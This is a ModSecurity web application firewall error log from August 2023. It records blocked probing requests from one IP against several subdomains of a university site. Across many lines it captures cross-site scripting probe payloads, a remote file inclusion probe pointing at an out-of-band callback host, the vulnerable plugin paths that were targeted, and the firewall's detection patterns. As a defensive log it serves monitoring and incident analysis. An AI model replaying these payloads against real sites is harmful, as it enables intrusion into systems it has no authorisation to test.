[Tue Aug 29 11:53:56.637515 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:error_description: <svg/onload=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAAoqbYAAAAAj"]
[Tue Aug 29 11:53:56.637566 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:error_description: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAApOdcYAAAAL"]
[Tue Aug 29 11:53:56.640515 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:error_description: <svg/onload=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAAoUJe4AAAAB"]
[Tue Aug 29 11:53:57.581624 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:!'><sVg/OnLoAD. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:!'><sVg/OnLoAD: !'><sVg/OnLoAD"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Login"] [unique_id "ZO155cCo-f0AAAoUJe8AAAAB"]
[Tue Aug 29 11:53:57.790396 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:error_description: <svg/onload=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155cCo-f0AAApLWlUAAAAI"]
[Tue Aug 29 11:54:00.545137 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAApQ2VsAAAAb"]
[Tue Aug 29 11:54:00.556205 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAAox7MsAAAAN"]
[Tue Aug 29 11:54:00.557243 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAApOddAAAAAL"]
[Tue Aug 29 11:54:00.584075 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAAo2m8sAAAAA"]
[Tue Aug 29 11:54:00.589773 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAApHRX4AAAAP"]
[Tue Aug 29 11:54:00.601260 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAApOddEAAAAL"]
[Tue Aug 29 11:54:00.602590 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAApLWlsAAAAI"]
[Tue Aug 29 11:54:00.625388 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAApLWlwAAAAI"]
[Tue Aug 29 11:54:00.628129 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAApJDWQAAAAY"]
[Tue Aug 29 11:54:00.636634 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAAoUJfoAAAAB"]
[Tue Aug 29 11:54:00.648220 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAApOddMAAAAL"]
[Tue Aug 29 11:54:00.648662 2023] [:error] [pid 2639] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAApPcvcAAAAa"]
[Tue Aug 29 11:54:00.650404 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAAoGFhkAAAAE"]
[Tue Aug 29 11:54:00.653130 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAApQ2V4AAAAb"]
[Tue Aug 29 11:54:00.717542 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAAoAk3gAAAAC"]
[Tue Aug 29 11:54:00.719894 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAAoGFhoAAAAE"]
[Tue Aug 29 11:54:00.719974 2023] [:error] [pid 2639] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAApPcvgAAAAa"]
[Tue Aug 29 11:54:00.721228 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAAo2m88AAAAA"]
[Tue Aug 29 11:54:00.747913 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAAn40-0AAAAW"]
[Tue Aug 29 11:54:00.751799 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAAoGFhsAAAAE"]
[Tue Aug 29 11:54:01.629554 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAAolKckAAAAe"]
[Tue Aug 29 11:54:01.640749 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAAoGFhwAAAAE"]
[Tue Aug 29 11:54:01.667659 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAAoAk3oAAAAC"]
[Tue Aug 29 11:54:01.682679 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAAn41AAAAAAW"]
